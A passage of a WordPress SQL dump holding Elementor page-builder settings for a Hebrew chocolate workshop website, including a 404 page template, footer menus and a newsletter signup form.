\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(573,130,'_elementor_version','0.4'),(579,132,'_edit_last','1'),(580,132,'_edit_lock','1527093384:1'),(583,132,'_wp_desired_post_slug',''),(585,132,'_wp_page_template','default'),(586,132,'_yoast_wpseo_content_score','30'),(587,132,'_yoast_wpseo_meta-robots-noindex','1'),(588,134,'_elementor_template_type','single'),(589,134,'_elementor_edit_mode','builder'),(590,134,'_edit_lock','1527093785:1'),(592,135,'_wp_attached_file','2018/05/tim-bish-171738-unsplash.jpg'),(593,135,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:1060;s:4:\"file\";s:36:\"2018/05/tim-bish-171738-unsplash.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"tim-bish-171738-unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"tim-bish-171738-unsplash-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"tim-bish-171738-unsplash-768x509.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:37:\"tim-bish-171738-unsplash-1024x678.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:678;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:36:\"tim-bish-171738-unsplash-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(594,135,'_elementor_source_image_hash','1ba7996a31c0abb6917c4008d82e13508fe7a22a'),(595,134,'_elementor_conditions','a:1:{i:0;s:29:\"include/singular/not_found404\";}'),(596,136,'_elementor_template_type','single'),(597,136,'_elementor_edit_mode','builder'),(598,136,'_elementor_conditions','a:1:{i:0;s:29:\"include/singular/not_found404\";}'),(599,134,'_wp_page_template','default'),(600,134,'_elementor_data','[{\"id\":\"fea7b5\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"15dbe7db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"723c6bac\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62251213\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"eaceb8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"64f357a3\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"10c4aa07\",\"elType\":\"section\",\"settings\":{\"height\":\"full\",\"custom_height\":{\"unit\":\"vh\",\"size\":100},\"content_position\":\"middle\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"layout\":\"full_width\",\"column_position\":\"stretch\",\"reverse_order_mobile\":\"reverse-mobile\",\"custom_height_tablet\":{\"unit\":\"vh\",\"size\":\"\"},\"custom_height_mobile\":{\"unit\":\"vh\",\"size\":\"\"}},\"elements\":[{\"id\":\"53e3b92f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":55},\"elements\":[{\"id\":\"3d6dbce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"404\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":199},\"typography_font_weight\":\"bold\",\"typography_line_height\":{\"unit\":\"px\",\"size\":170},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":150},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":120}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"318b0472\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05e6\\u05d8\\u05e2\\u05e8\\u05d9\\u05dd, \\u05d4\\u05e2\\u05de\\u05d5\\u05d3 \\u05e9\\u05d7\\u05d9\\u05e4\\u05e9\\u05ea \\u05db\\u05d1\\u05e8 \\u05dc\\u05d0 \\u05e7\\u05d9\\u05d9\\u05dd, \\u05dc\\u05d0 \\u05d1\\u05db\\u05d5\\u05d5\\u05e0\\u05d4.\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":23},\"align\":\"center\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.3},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":20},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a17ec63\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d7\\u05d6\\u05d5\\u05e8 \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d4\\u05d1\\u05d9\\u05ea\",\"size\":\"lg\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.1},\"align\":\"center\",\"icon_indent\":{\"unit\":\"px\",\"size\":16},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4b9cfcc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"top right\",\"background_size\":\"cover\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"36968c76\",\"elType\":\"widget\",\"settings\":{\"space_mobile\":{\"unit\":\"px\",\"size\":173}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"692d9226\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"1163408c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5611192a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"58660710\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"5eaef7ba\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3ac6a154\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"2b3d0b82\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"3a12d7ff\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7311fd62\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"19017191\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"494db04b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4c8c1610\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"26d5e26c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(601,137,'_elementor_template_type','single'),(602,137,'_elementor_edit_mode','builder'),(603,137,'_elementor_conditions','a:1:{i:0;s:29:\"include/singular/not_found404\";}'),(604,137,'_wp_page_template','default'),(605,137,'_elementor_data','[{\"id\":\"10c4aa07\",\"elType\":\"section\",\"settings\":{\"height\":\"full\",\"custom_height\":{\"unit\":\"vh\",\"size\":100},\"content_position\":\"middle\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"layout\":\"full_width\",\"column_position\":\"stretch\",\"reverse_order_mobile\":\"reverse-mobile\",\"custom_height_tablet\":{\"unit\":\"vh\",\"size\":\"\"},\"custom_height_mobile\":{\"unit\":\"vh\",\"size\":\"\"}},\"elements\":[{\"id\":\"53e3b92f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":55},\"elements\":[{\"id\":\"3d6dbce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"404\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":199},\"typography_font_weight\":\"bold\",\"typography_line_height\":{\"unit\":\"px\",\"size\":170},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":150},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":120}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"318b0472\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05e6\\u05d8\\u05e2\\u05e8\\u05d9\\u05dd, \\u05d4\\u05e2\\u05de\\u05d5\\u05d3 \\u05e9\\u05d7\\u05d9\\u05e4\\u05e9\\u05ea \\u05db\\u05d1\\u05e8 \\u05dc\\u05d0 \\u05e7\\u05d9\\u05d9\\u05dd, \\u05dc\\u05d0 \\u05d1\\u05db\\u05d5\\u05d5\\u05e0\\u05d4.\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":23},\"align\":\"center\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.3},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":20},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a17ec63\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d7\\u05d6\\u05d5\\u05e8 \\u05dc\\u05e2\\u05de\\u05d5\\u05d3 \\u05d4\\u05d1\\u05d9\\u05ea\",\"size\":\"lg\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.1},\"align\":\"center\",\"icon_indent\":{\"unit\":\"px\",\"size\":16},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4b9cfcc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"top 